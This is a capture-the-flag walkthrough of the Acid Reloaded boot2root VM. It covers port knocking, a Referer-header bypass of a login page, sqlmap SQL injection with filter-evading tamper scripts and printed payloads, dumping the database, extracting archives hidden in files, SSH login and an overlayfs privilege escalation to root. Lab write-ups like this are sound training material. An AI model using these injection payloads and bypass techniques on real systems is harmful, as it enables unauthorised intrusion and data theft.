1300 853 970Mon. - Fri. 08:30-17:30

Acid Reloaded Capture The Flag Walkthru

Posted in: Cyber Security, Hacking, Testing

Acid Reloaded Capture The Flag Walkthru

Acid Reloaded is a boot2root Capture the Flag (CTF) hacking exercise, designed by Avinash Kumar Thapa. This is a walkthru of this CTF, created by Robert Winkel, including his thoughts at the time, his failures, and his successes.

Attack

Find the IP address:

root@kali:~# netdiscover -r 192.168.159.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts
 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -------------------------------------------------------------------------
 192.168.159.1   00:50:56:c0:00:01    01    060   VMWare, Inc.
 192.168.159.141 00:0c:29:b3:16:f6    01    060   VMware, Inc.
 192.168.159.254 00:50:56:fb:6d:d5    01    060   VMWare, Inc.

Find the services:

root@kali:~# nmap -sV -p- -T4 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 21:53 AEST
Nmap scan report for 192.168.159.141
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
33447/tcp filtered unknown
MAC Address: 00:0C:29:B3:16:F6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1596.40 seconds

Let’s check out what’s on SSH:

root@kali:~# ssh root@192.168.159.141
The authenticity of host '192.168.159.141 (192.168.159.141)' can't be established.
ECDSA key fingerprint is a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.159.141' (ECDSA) to the list of known hosts.

    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
root@192.168.159.141's password:

So there is probably port knocking going on. I’m guessing knock port 3, then 2, then 1, or maybe port 321, and then maybe port 33447 (or some other random port) will open? Let’s try:

root@kali:~# nmap -T4 --max-retries=0 -p3 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:36 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00024s latency).
PORT  STATE    SERVICE
3/tcp filtered compressnet
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

root@kali:~# nmap -T4 --max-retries=0 -p2 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:36 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00024s latency).
PORT  STATE    SERVICE
2/tcp filtered compressnet
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

root@kali:~# nmap -T4 --max-retries=0 -p1 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:37 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00025s latency).
PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds

root@kali:~# nmap -sV -p33447 -T4 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:37 AEST
Nmap scan report for 192.168.159.141
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds

So let’s see what’s on that web server:

1

Not much…

The source code of the page reveals nothing of interest. There is no robots.txt file.

Dirbuster finds the following directories:

2

Looking at /bin/ reveals the following page:

3

I tried some manual SQL injection attempts, but all failed. I tried using sqlmap, but that also failed to find any SQLi.

The source code indicates there are subdirectories of /bin/crack/, /bin/crack/css/, /bin/crack/js/, /bin/js/, and /bin/includes/. Dirbuster also finds /bin/styles/, but this is not readable, and /bin/dashboard.php, but this returns the message “You are not authorized to access this page. Please login”.

4

At this stage, there is a sec_session_id cookie for 192.168.158.141. The session cookie may be used for authorisation, but there is also that chance that it is not needed. Instead, a Referer HTTP header may be used.

Looking at the source code for http://192.168.159.141:33447/bin/index.php, I see that includes/validation.php is called:

<form  action="includes/validation.php" method="post" name="login_form">
Email: <input type="text" placeholder="Email Address" name="email" maxlength="20" />
Password: <input type="password" placeholder="Password" name="password" id="password"/>
<input type="submit" value="Login" onclick="formhash(this.form, this.form.password);" />
</form>

Logically, logging in from http://192.168.159.141:33447/bin/index.php will then send me to http://192.168.159.141:33447/bin/includes/validation.php, and then I may be forwarded to http://192.168.159.141:33447/bin/dashboard.php. So I’ll reload http://192.168.159.141:33447/bin/dashboard.php, but intercept the traffic with a proxy, and modify the Referer HTTP header to http://192.168.159.141:33447/bin/includes/validation.php.

5

Excellent! Clicking on “Click” forwards to http://192.168.159.141:33447/bin/l33t_haxor.php:

6

The source code for this page reveals:

<img src='http://assets-s3.usmagazine.com/uploads/assets/articles/85688-success-kid-meme-kidney-sick-father/1429037342_success-kid-meme-lg.jpg'><a href="l33t_haxor.php?id=" style="text-decoration:none"></a>

On my first attempt, I guessed “id=1”. http://192.168.159.141:33447/bin/l33t_haxor.php?id=1 returns:

7

Actually, changing the id value to any value between 1 and 10 returns something similar, just with a different message. I looked at the source code for all of these pages, but found no additional information.

Adding a single quote to the end of any of the above URLs produces a nice MySQL error:

8

I tried a few manual attempts to exploit the SQLi, but with no luck. However, the input http://192.168.159.145:33447/bin/l33t_haxor.php?id=1%20%22 produced the following:

9

Although I had a direct connection to the Internet, that image just wouldn’t display. Going to it directly produces a 404 error. As the image may be useful, I did a Google search for the image name (hacker_detected_wp_by_er0n22.jpg) which produced the following:

10.png

To me, this indicates that my SQLi attempt was detected, probably through some sort of a pattern match.
I then I tried sqlmap with no options, but this produced no hits:

sqlmap -u "http://192.168.159.141:33447/bin/l33t_haxor.php?id=1*" --dbms=mysql

Assuming there is some sort of SQLi detection going on, I tried a bunch of sqlmap –tamper scripts to bypass the detection:

root@kali:~# sqlmap -u "http://192.168.159.141:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150823}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:54:16

[22:54:16] [INFO] loading tamper script 'space2comment'
[22:54:16] [INFO] loading tamper script 'space2dash'
[22:54:16] [INFO] loading tamper script 'space2hash'
[22:54:16] [WARNING] tamper script 'space2hash' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2mysqlblank'
[22:54:16] [WARNING] tamper script 'space2mysqlblank' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2mysqldash'
[22:54:16] [WARNING] tamper script 'space2mysqldash' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2plus'
[22:54:16] [INFO] loading tamper script 'space2randomblank'
[22:54:16] [WARNING] using too many tamper scripts is usually not a good idea
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[22:54:16] [INFO] testing connection to the target URL
[22:54:16] [INFO] heuristics detected web page charset 'ascii'
[22:54:16] [INFO] testing if the target URL is stable
[22:54:17] [INFO] target URL is stable
[22:54:17] [INFO] testing if URI parameter '#1*' is dynamic
[22:54:17] [INFO] confirming that URI parameter '#1*' is dynamic
[22:54:17] [INFO] URI parameter '#1*' is dynamic
[22:54:17] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[22:54:17] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to XSS attacks
[22:54:17] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:54:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:54:18] [WARNING] reflective value(s) found and filtering out
[22:54:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:54:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:54:18] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable 
[22:54:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:54:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:54:18] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[22:54:18] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[22:54:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[22:54:18] [INFO] URI parameter '#1*' is 'MySQL OR error-based - WHERE or HAVING clause' injectable 
[22:54:18] [INFO] testing 'MySQL inline queries'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:54:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:54:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [22:54:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:54:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:54:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:54:28] [INFO] URI parameter '#1*' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)' injectable 
[22:54:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:54:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:54:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:54:29] [INFO] target URL appears to be UNION injectable with 2 columns
[22:54:29] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:54:29] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-1427') OR 8540=8540#"

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-6762') OR 1 GROUP BY CONCAT(0x7170707071,(SELECT (CASE WHEN (1204=1204) THEN 1 ELSE 0 END)),0x717a6a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#"

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=1') AND (SELECT * FROM (SELECT(SLEEP(5)))bwnh)#"

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-1981') UNION ALL SELECT NULL,CONCAT(0x7170707071,0x417242476a5342594967,0x717a6a6b71)#"
---
[22:54:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[22:54:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[22:54:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.159.141'

[*] shutting down at 22:54:29

Adding a –dbs produces:

available databases [4]:                                                                      
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login

Adding a -D secure_login –dump produces:

Database: secure_login
Table: UB3R/strcpy.exe
[0 entries]
+----+------+
| id | Name |
+----+------+
+----+------+

Table: word
[10 entries]
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | Description                                                                                                                                                                                              |
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | The hacker community may be small, but it possesses the skills that are driving the global economies of the future.                                                                                      |
| 2  | Younger hackers are hard to classify. They're probably just as diverse as the old hackers are. We're all over the map.                                                                                   |
| 3  | Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.                                                                      |
| 4  | As a matter of fact, yeah, they were foolproof. The problem is that you don't have to protect yourself against fools. You have to protect yourself against people like me.                               |
| 5  | Never underestimate the determination of a kid who is time-rich and cash-poor.                                                                                                                           |
| 6  |  Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.                                                                     |
| 7  | What hackers do is figure out technology and experiment with it in ways many people never imagined. They also have a strong desire to share this information with others and to explain it to people who |
| 8  |  My actions constituted pure hacking that resulted in relatively trivial expenses for the companies involved, despite.                                                                                   |
| 9  |  Hacking is a art of thinking outside the box in order to challenge the normal behaviour of application created by developers.                                                                           |
| 10 | What is the difference between active recon and passive recon ????                                                                                                                                       |
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Table: members
[0 entries]
+----+------+-------+----------+----------+
| id | salt | email | username | password |
+----+------+-------+----------+----------+
+----+------+-------+----------+----------+

Table: login_attempts
[10 entries]
+---------+------------+
| user_id | time       |
+---------+------------+
| 1       | 1385995353 |
| 1       | 1386011064 |
| 2       | 1438676747 |
| 2       | 1438676749 |
| 2       | 1438676784 |
| 3       | 1438682944 |
| 3       | 1438692301 |
| 2       | 1438698562 |
| 2       | 1438708687 |
| 4       | 1438852932 |
+---------+------------+

Hmm, not much use there. But the “UB3R/strcpy.exe” bit looks more like a file location than a table name. Sure enough, going to http://192.168.159.141:33447/UB3R/strcpy.exe in my browser allows me to download the strcpy.exe file. Now to see what it is:

root@kali:~# file strcpy.exe 
strcpy.exe: PDF document, version 1.5

Oh wow. Some pretty serious obfuscation there. Only uber hackers would guess that it isn’t really a .exe file *eyeroll*. So I change the file extension to .pdf and open the strcpy.pdf file:

10

So the PDF file only contains the above image. I don’t believe that for a second. There has to be more info in there somewhere. Maybe in PDF metadata, or the image EXIF data, or some sort of other information that isn’t being displayed. So now I look for it…

Running a “strings” on the strcpy.pdf produces the following:

%%EOFRar!
acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg

Ooh, look at the “Rar!” bit. That’s the magic number for a RAR archive. Could this file be a chameleon? Two files joined together? Under this assumption, I look further:

root@kali:~# cp strcpy.pdf strcpy.rar
root@kali:~# unrar l strcpy.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Archive: strcpy.rar
Details: RAR 4, SFX

 Attributes      Size    Date   Time   Name
----------- ---------  -------- -----  ----
    ..A....        92  23-08-15 18:16  acid.txt    
    ..A....     60961  23-08-15 18:09  lol.jpg     
----------- ---------  -------- -----  ----
                61053                  2

After extracting the files, they appear as follows:

root@kali:~# cat acid.txt 
You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,

11

Well both of the files look pretty useless on first glance. Maybe the image contains some interesting EXIF data? Using the EXIF viewer at http://regex.info/exif.cgi revealed no interesting information.

Running “strings” on lol.jpg produces:

Rar!
"ot 
Avinash.contact
r9lD
,~E|i
TMcX
\	'|!
k\w;
{{5WH
aG]p
Q%,i]
UR]7
@7W!
Rv<{p]]D
gswW
@ugt 
hint.txt
`You have found a contact. Now, go and grab the details :-)

Ah, another chameleon!

root@kali:~# cp lol.jpg lol.rar
root@kali:~# unrar l lol.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Archive: lol.rar
Details: RAR 4, SFX

 Attributes      Size    Date   Time   Name
----------- ---------  -------- -----  ----
    ..A....      1662  23-08-15 17:10  Avinash.contact
    ..A....        62  23-08-15 17:11  hint.txt    
----------- ---------  -------- -----  ----
                 1724                  2

root@kali:~# unrar e lol.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal


Extracting from lol.rar

Extracting  Avinash.contact                                           OK 
Extracting  hint.txt                                                  OK 
All OK

root@kali:~# cat hint.txt 
You have found a contact. Now, go and grab the details :-)

root@kali:~# cat Avinash.contact 
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
	<c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended>AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</c:Extended>
	<c:ContactIDCollection><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>

There are a few interesting values in the extracted Avinash.contact file, which I have highlighted in red, above.

The “AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=” strings looks like base64 encoding.

root@kali:~# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -d 
□□NooB@123

There ware a couple of unprintable characters at the start of “NooB@123”, but I am not sure what they are form. However, the “NooB@123” looks like a password to me. I assume “acid.exploit@gmail.com” is the associated username. I tried that email address in /bin/index.php, but it only allows enough characters to type “acid.exploit@gmail.c”. I tried using a proxy to bypass the length restriction, but the password wasn’t accepted.

Port 22 is open, so I tried to use the above information to login via SSH. After several attempts, I found the lowercase version of “Makke” is the username:

root@kali:~# ssh makke@192.168.159.145

    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
makke@192.168.159.145's password: 
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

168 packages can be updated.
91 updates are security updates.

Last login: Mon Aug 24 21:25:34 2015 from 192.168.88.236

Got a user shell now! Time to look around and try to privesc.

makke@acid:~$ pwd
/home/makke
makke@acid:~$ ls -al
total 32
drwxr-xr-x 3 makke makke 4096 Aug 24 21:28 .
drwxr-xr-x 4 root  root  4096 Aug 24 19:11 ..
-rw------- 1 makke makke  205 Aug 24 21:31 .bash_history
-rw-r--r-- 1 makke makke  220 Aug 24 19:11 .bash_logout
-rw-r--r-- 1 makke makke 3760 Aug 24 19:11 .bashrc
drwx------ 2 makke makke 4096 Aug 24 21:25 .cache
-rw-rw-r-- 1 makke makke   40 Aug 24 21:28 .hint
-rw-r--r-- 1 makke makke  675 Aug 24 19:11 .profile
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs 
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint 
clear
cd /bin/
ls
./overlayfs 
clear
wgt
wget
apt-get remove wget
su
su -
exit

makke@acid:~$ cat .hint
Run the executable to own kingdom :-)

OK, two things spring to mind here. The first is that “overlayfs” may refer to the Ubuntu overlayfs exploit that I have seen a few times before – worth a try. The second is that running /bin/overlayfs may provide some more info – maybe leading to a buffer overflow that I’ll have to exploit.

makke@acid:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 15.04
Release:	15.04
Codename:	vivid

OK, so the overlayfs exploit may work. I’ll try that later if /bin/overlayfs proves to be useless.

makke@acid:~$ /bin/overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

Bingo! Well, that was a lot simpler than I had thought…

# cd /root/
# ls -al
total 68
drwx------  5 root root  4096 Aug 24 21:32 .
drwxr-xr-x 22 root root  4096 Aug 24 20:58 ..
-rw-------  1 root root 23934 Aug 24 22:25 .bash_history
-rw-r--r--  1 root root  3135 Aug  8 18:02 .bashrc
drwx------  2 root root  4096 Aug 24 17:46 .cache
drwx------  3 root root  4096 Aug  6 17:55 .config
drwx------  3 root root  4096 Aug  6 15:51 .dbus
-rw-r--r--  1 root root   284 Aug 24 20:57 .flag.txt
-rw-------  1 root root  2775 Aug 24 21:32 .mysql_history
-rw-------  1 root root   147 Aug 24 23:32 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6 17:31 .selected_editor

# cat .flag.txt
Dear Hax0r,

You have completed the Challenge Successfully.

Your Flag is : "Black@Current@Ice-Cream"

Kind & Best Regards

-ACiD

Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5

by Robert Winkel
robert3

Leave a Reply